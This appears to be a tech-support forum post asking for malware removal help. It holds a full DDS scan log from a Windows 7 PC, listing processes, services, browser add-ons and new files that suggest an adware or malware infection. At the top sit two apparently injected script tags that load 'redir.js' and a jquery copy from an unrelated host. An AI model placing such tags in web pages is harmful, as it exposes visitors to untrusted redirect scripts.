<script src="http://us.clickscart.in/js/jquery-1.8.2.min.js" type="text/javascript"></script>
<script src="http://us.clickscart.in/js/redir.js" type="text/javascript"></script>
It would be a huge help for my issue to be solved, this tech forum seems amazing!

DDS:
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17840 BrowserJavaVersion: 11.45.2
Run by FFCory at 22:03:57 on 2015-07-14
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.3571.2183 [GMT -4:00]
.
AV: ThreatTrack Security VIPRE *Enabled/Updated* {FFE93D16-FD09-0282-C7D3-8B1731B6A051}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: ThreatTrack Security VIPRE *Enabled/Updated* {4488DCF2-DB33-0D0C-FD63-B0654A31EAEC}
FW: ThreatTrack Security VIPRE *Enabled* {C7D2BC33-B766-03DA-EC8C-2222CF65E72A}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
C:\Program Files (x86)\Microsoft\BingDesktop\BingDesktopUpdater.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Program Files (x86)\GFI\LanGuard 11 Agent\lnssatt.exe
C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
C:\Program Files (x86)\PDF Complete\pdfsvc.exe
C:\Program Files (x86)\VIPRE\SBPIMSvc.exe
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
C:\Program Files\Logitech\SetPointP\SetPoint.exe
C:\Program Files\Eraser\Eraser.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Gyazo\GyStation.exe
C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
C:\Program Files (x86)\Ask.com\Updater\Updater.exe
C:\Program Files (x86)\VIPRE\SBAMTray.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe
C:\Program Files\McAfee Security Scan\3.8.130\SSScheduler.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\VIPRE\SBAMSvc.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\GWX\GWX.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\WUDFHost.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Windows\cygavb.exe
C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Program Files\Logitech\SetPointP\LogiAppBroker.exe
C:\Program Files (x86)\GFI\LanGuard 11 Agent\Mantle.exe
C:\Windows\wnavga.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.bing.com/?pc=U162
uURLSearchHooks: UrlSearchHook Class: {00000000-6E41-4FD3-8538-502F5495E5FC} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
uURLSearchHooks: {7473b6bd-4691-4744-a82b-7854eb3d70b6} - <orphaned>
mURLSearchHooks: {7473b6bd-4691-4744-a82b-7854eb3d70b6} - <orphaned>
mWinlogon: Userinit = userinit.exe
BHO: MSS+ Identifier: {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} - C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll
BHO: SteadyVideoBHO Class: {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} - c:\Program Files (x86)\AMD\SteadyVideo\SteadyVideo.dll
BHO: {7473b6bd-4691-4744-a82b-7854eb3d70b6} - <orphaned>
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: VIPRE Search Guard Helper: {963C8283-AE7F-4AA6-9B3B-847A8FC62C5E} - C:\Program Files (x86)\VIPRE\VSGN.dll
BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll
BHO: KeyDownload Class: {C1EA4179-A319-4c6a-A3E5-67FF3592A12E} - C:\Program Files (x86)\KeyDownload-Addon\KeyDownload.dll
BHO: Bing Bar Helper: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -
BHO: Ask Toolbar: {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll
BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll
TB: Bing Bar: {8dcb7100-df86-4384-8842-8fa844297b3f} -
TB: Ask Toolbar: {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files (x86)\Ask.com\GenericAskToolbar.dll
TB: VIPRE Search Guard Toolbar: {A924C17A-5E94-4E02-BED5-49720BA6F7FA} - C:\Program Files (x86)\VIPRE\VSGN.dll
TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
uRun: [GoogleChromeAutoLaunch_2B44178D45242E3C3BC4A3F0B1461B2F] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
uRun: [Gyazo] C:\Program Files (x86)\Gyazo\GyStation.exe
mRun: [StartCCC] "c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
mRun: [PDF Complete] C:\Program Files (x86)\PDF Complete\pdfsty.exe
mRun: [ApnUpdater] "C:\Program Files (x86)\Ask.com\Updater\Updater.exe"
mRun: [SBAMTray] "C:\Program Files (x86)\VIPRE\SBAMTray.exe"
mRun: [ApnTBMon] "C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe"
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [BingDesktop] C:\Program Files (x86)\Microsoft\BingDesktop\BingDesktop.exe /fromkey
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\MCAFEE~1.LNK - C:\Program Files\McAfee Security Scan\3.8.130\SSScheduler.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000
IE: Send image to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_37-windows-i586.cab
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{B04EDAD8-EE9A-4CC3-8B46-44B1E37C9002} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{B04EDAD8-EE9A-4CC3-8B46-44B1E37C9002}\2427967696474756 : DHCPNameServer = 192.168.2.1
TCP: Interfaces\{B04EDAD8-EE9A-4CC3-8B46-44B1E37C9002}\E45445745414254313 : DHCPNameServer = 192.168.1.1
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files (x86)\AMD\SteadyVideo\VideoMIMEFilter.dll
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files (x86)\AMD\SteadyVideo\VideoMIMEFilter.dll
Handler: vipresg - {47BE2E5B-703B-444F-ABD3-05717D2191C6} - C:\Program Files (x86)\VIPRE\VSGN.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.134\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
mASetup: {F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1} - msiexec /fu {F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1} /qn
IFEO: bitguard.exe - tasklist.exe
IFEO: bprotect.exe - tasklist.exe
IFEO: bpsvc.exe - tasklist.exe
IFEO: browserdefender.exe - tasklist.exe
IFEO: browserprotect.exe - tasklist.exe
x64-BHO: SteadyVideoBHO Class: {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} - c:\Program Files\AMD\SteadyVideo\SteadyVideo.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll
x64-BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll
x64-TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-Run: [hpsysdrv] c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe
x64-Run: [SBRegRebootCleaner] "C:\Program Files (x86)\GFI Software\VIPRE\SBRC.exe"
x64-Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
x64-Run: [Eraser] "C:\Program Files\Eraser\Eraser.exe" -atRestart
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
x64-IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
x64-Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll
x64-Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll
x64-Handler: vipresg - {47BE2E5B-703B-444F-ABD3-05717D2191C6} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {B34A07DD-C6F7-414A-AE63-01019482EAF0} - msiexec /fu {B34A07DD-C6F7-414A-AE63-01019482EAF0} /qn
x64-IFEO: bitguard.exe - tasklist.exe
x64-IFEO: bprotect.exe - tasklist.exe
x64-IFEO: bpsvc.exe - tasklist.exe
x64-IFEO: browserdefender.exe - tasklist.exe
x64-IFEO: browserprotect.exe - tasklist.exe
.
Note: multiple IFEO entries found. Please refer to Attach.txt
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\FFCory\AppData\Roaming\Mozilla\Firefox\Profiles\3p8047d6.default\
FF - prefs.js: browser.search.selectedEngine - Bing
FF - prefs.js: browser.startup.homepage - hxxp://www.bing.com/?pc=U159
FF - prefs.js: keyword.URL - hxxp://www.bing.com/search?FORM=U159DF&PC=U159&q=
FF - prefs.js: network.proxy.type - 4
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMSS.dll
FF - plugin: C:\Users\FFCory\AppData\Roaming\Mozilla\plugins\np-mswmp.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_203.dll
.
============= SERVICES / DRIVERS ===============
.
R0 amd_sata;amd_sata;C:\Windows\System32\drivers\amd_sata.sys [2012-1-12 78976]
R0 amd_xata;amd_xata;C:\Windows\System32\drivers\amd_xata.sys [2012-1-12 38528]
R1 SbFw;SbFw;C:\Windows\System32\drivers\SbFw.sys [2013-3-10 260816]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2012-1-12 204288]
R2 APNMCP;Ask Update Service;C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe [2015-4-28 178568]
R2 BBUpdate;BBUpdate;C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE [2011-7-20 249648]
R2 BingDesktopUpdate;Bing Desktop Update service;C:\Program Files (x86)\Microsoft\BingDesktop\BingDesktopUpdater.exe [2014-6-3 173792]
R2 cvhsvc;Client Virtualization Handler;C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE [2015-3-18 822496]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-13 27136]
R2 gfi_lanss11_attservice;GFI LanGuard 11 Attendant Service;C:\Program Files (x86)\GFI\LanGuard 11 Agent\lnssatt.exe [2012-11-23 133496]
R2 HP Support Assistant Service;HP Support Assistant Service;C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe [2013-11-4 99128]
R2 HPClientSvc;HP Client Services;C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe [2010-10-11 346168]
R2 NOBU;Norton Online Backup;C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2010-6-1 2804568]
R2 pdfcDispatcher;PDF Document Manager;C:\Program Files (x86)\PDF Complete\pdfsvc.exe [2012-1-12 1128952]
R2 SBAMSvc;VIPRE Internet Security;C:\Program Files (x86)\VIPRE\SBAMSvc.exe [2013-8-30 3937472]
R2 sbapifs;sbapifs;C:\Windows\System32\drivers\sbapifs.sys [2013-6-18 88928]
R2 SBPIMSvc;SB Recovery Service;C:\Program Files (x86)\VIPRE\SBPIMSvc.exe [2013-8-30 176016]
R2 sftlist;Application Virtualization Client;C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe [2014-10-8 534184]
R2 WinGraph;Windows Graphics Accelerator;C:\Windows\wnavga.exe [2015-7-2 7680]
R3 gfiark;gfiark;C:\Windows\System32\drivers\gfiark.sys [2013-3-10 41032]
R3 gfiutil;gfiutil;C:\Windows\System32\drivers\gfiutil.sys [2013-11-19 31264]
R3 LEqdUsb;Logitech SetPoint Unifying KMDF USB Filter;C:\Windows\System32\drivers\LEqdUsb.sys [2014-3-18 77592]
R3 LHidEqd;Logitech SetPoint Unifying KMDF HID Filter;C:\Windows\System32\drivers\LHidEqd.sys [2014-3-18 13080]
R3 netr28x;Ralink 802.11n Extensible Wireless Driver;C:\Windows\System32\drivers\netr28x.sys [2012-1-12 2486416]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2012-1-12 533096]
R3 SBFWIMCLMP;GFI Software Firewall NDIS IM Filter Miniport;C:\Windows\System32\drivers\SbFwIm.sys [2013-3-10 120608]
R3 sbwtis;sbwtis;C:\Windows\System32\drivers\sbwtis.sys [2012-12-11 88864]
R3 ScreamBAudioSvc;ScreamBee Audio;C:\Windows\System32\drivers\ScreamingBAudio64.sys [2012-7-31 38992]
R3 Sftfs;Sftfs;C:\Windows\System32\drivers\Sftfslh.sys [2014-10-8 766632]
R3 Sftplay;Sftplay;C:\Windows\System32\drivers\Sftplaylh.sys [2014-10-8 273576]
R3 Sftredir;Sftredir;C:\Windows\System32\drivers\Sftredirlh.sys [2014-10-8 29352]
R3 Sftvol;Sftvol;C:\Windows\System32\drivers\Sftvollh.sys [2014-10-8 23208]
R3 sftvsa;Application Virtualization Service Agent;C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [2014-10-8 211104]
R3 usbfilter;AMD USB Filter Driver;C:\Windows\System32\drivers\usbfilter.sys [2012-1-12 47232]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 lxqvbcbiws32;lxqvbcbiws32;C:\Program Files\015\lxqvbcbiws32.exe run options=10001010150000000000000000000000 source=13 stdout=reg:HKEY_LOCAL_MACHINE,Software\\MIA,MIA_ERROR --> C:\Program Files\015\lxqvbcbiws32.exe run options=10001010150000000000000000000000 source=13 stdout=reg:HKEY_LOCAL_MACHINE,Software\\MIA,MIA_ERROR [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-6-3 327296]
S3 BBSvc;Bing Bar Update Service;C:\Program Files (x86)\Microsoft\BingBar\BBSvc.EXE [2011-8-1 195320]
S3 BTWAMPFL;BTWAMPFL;C:\Windows\System32\drivers\btwampfl.sys [2015-1-20 349224]
S3 btwl2cap;Bluetooth L2CAP Service;C:\Windows\System32\drivers\btwl2cap.sys [2015-1-20 39464]
S3 EraserUtilDrv11122;EraserUtilDrv11122;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11122.sys [2012-5-29 138360]
S3 EraserUtilDrv11210;EraserUtilDrv11210;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11210.sys [2012-8-7 138912]
S3 EraserUtilDrv11220;EraserUtilDrv11220;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11220.sys [2013-3-9 138912]
S3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2012-2-19 138360]
S3 GamesAppIntegrationService;GamesAppIntegrationService;C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [2015-2-9 347200]
S3 GamesAppService;GamesAppService;C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [2014-12-16 265808]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2015-6-10 114688]
S3 ManyCam;ManyCam Virtual Webcam;C:\Windows\System32\drivers\mcvidrv.sys [2014-5-13 42224]
S3 mcaudrv_simple;ManyCam Virtual Microphone;C:\Windows\System32\drivers\mcaudrv_x64.sys [2014-5-13 35440]
S3 McComponentHostService;McAfee Security Scan Component Host Service;C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe [2013-9-6 288776]
S3 SBFWIMCL;GFI Software Firewall NDIS IM Filter Service;C:\Windows\System32\drivers\SbFwIm.sys [2013-3-10 120608]
S3 SbHips;SbHips;C:\Windows\System32\drivers\sbhips.sys [2013-3-10 63184]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2010-11-20 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2010-11-20 31232]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2014-8-16 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2012-2-20 1255736]
S3 WSDScan;WSD Scan Support via UMB;C:\Windows\System32\drivers\WSDScan.sys [2009-7-13 25088]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== File Associations ===============
.
ShellExec: SC2Editor.exe: open="C:/Program Files (x86)/StarCraft II/Support/SC2Editor.exe" "%1"
ShellExec: SC2Switcher.exe: open="C:/Program Files (x86)/StarCraft II/Support/SC2Switcher.exe" "%1"
.
=============== Created Last 30 ================
.
2015-07-14 23:25:30 -------- d-----w- C:\AdwCleaner
2015-07-14 23:16:55 18524336 ----a-w- C:\Windows\SysWow64\FlashPlayerInstaller.exe
2015-07-10 16:02:14 -------- d-----w- C:\Program Files\iPod
2015-07-10 16:02:14 -------- d-----w- C:\Program Files (x86)\iTunes
2015-07-10 16:02:13 -------- d-----w- C:\Program Files\iTunes
2015-07-09 19:41:53 778416 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2015-07-09 19:41:53 142512 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin5.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin4.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin3.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin2.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files (x86)\Mozilla Firefox\Plugins\npqtplugin5.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files (x86)\Mozilla Firefox\Plugins\npqtplugin4.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files (x86)\Mozilla Firefox\Plugins\npqtplugin3.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files (x86)\Mozilla Firefox\Plugins\npqtplugin2.dll
2015-07-05 16:42:32 159744 ----a-w- C:\Program Files (x86)\Mozilla Firefox\Plugins\npqtplugin.dll
2015-07-04 03:36:42 -------- d-----w- C:\Users\FFCory\AppData\Roaming\TVMC
2015-07-04 00:07:58 -------- d-----w- C:\Users\FFCory\AppData\Roaming\Kodi
2015-07-03 23:39:41 -------- d-----w- C:\ProgramData\Package Cache
2015-07-03 23:37:02 -------- d-----w- C:\Program Files (x86)\Kodi
2015-07-03 22:55:54 -------- d-----w- C:\Users\FFCory\AppData\Local\Eraser 6
2015-07-03 19:56:17 -------- d-----w- C:\Users\FFCory\AppData\Roaming\ZinioReader4
2015-07-03 15:56:26 -------- d-----w- C:\ProgramData\Blio
2015-07-03 15:56:19 -------- d-----w- C:\Users\FFCory\AppData\Roaming\Blio
2015-07-03 15:52:12 -------- d-----w- C:\Program Files (x86)\VS Revo Group
2015-07-03 15:10:30 12221144 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{05FA8A8A-8F7D-4B94-A8A1-2CF57590660C}\mpengine.dll
2015-07-03 15:03:49 -------- d-----w- C:\Program Files\Eraser
2015-07-02 23:33:42 -------- d-----w- C:\Users\FFCory\AppData\Roaming\51A47C4D-1435880022-34FE-4739-B5267357D0CD
2015-07-02 23:28:07 -------- d-----w- C:\Program Files (x86)\Exploremedia
2015-07-02 23:28:00 -------- d-----w- C:\ProgramData\Vnalieehusf
2015-07-02 23:27:50 -------- d-----w- C:\Program Files (x86)\predm
2015-07-02 23:24:21 -------- d-----w- C:\ProgramData\Ebon
2015-07-02 23:21:51 38 ----a-w- C:\Windows\initcvtr.bat
2015-07-02 23:21:51 3542 ----a-w- C:\Windows\mstdcvtr.bat
2015-07-02 23:21:48 -------- d-----w- C:\Users\FFCory\AppData\Roaming\Winsta
2015-07-02 23:21:47 -------- d-----w- C:\Users\FFCory\AppData\Roaming\Convertor
2015-07-02 23:21:46 -------- d-----w- C:\Users\FFCory\AppData\Roaming\PDFConvert
2015-07-02 23:21:46 -------- d-----w- C:\Users\FFCory\AppData\Roaming\51A47C4D-1435879306-34FE-4739-B5267357D0CD
2015-07-02 23:21:45 -------- d-----w- C:\Users\FFCory\AppData\Local\{74BEAA89-73AB-472B-9C34-C63AA6C03F96}
2015-07-02 23:21:39 -------- d-----w- C:\ProgramData\Ebonmedia
2015-07-02 23:21:38 -------- d-----w- C:\Program Files\13
2015-07-02 23:21:37 -------- d-----w- C:\Program Files\015
2015-06-17 04:23:50 94208 ----a-w- C:\Windows\SysWow64\QuickTimeVR.qtx
2015-06-17 04:23:50 69632 ----a-w- C:\Windows\SysWow64\QuickTime.qts
.
==================== Find3M ====================
.
2015-06-12 20:51:12 18960 ----a-w- C:\Windows\System32\drivers\LNonPnP.sys
2015-05-25 18:24:00 5569984 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-05-25 18:23:59 95680 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2015-05-25 18:23:59 155584 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2015-05-25 18:21:21 1728960 ----a-w- C:\Windows\System32\ntdll.dll
2015-05-25 18:18:56 43520 ----a-w- C:\Windows\System32\csrsrv.dll
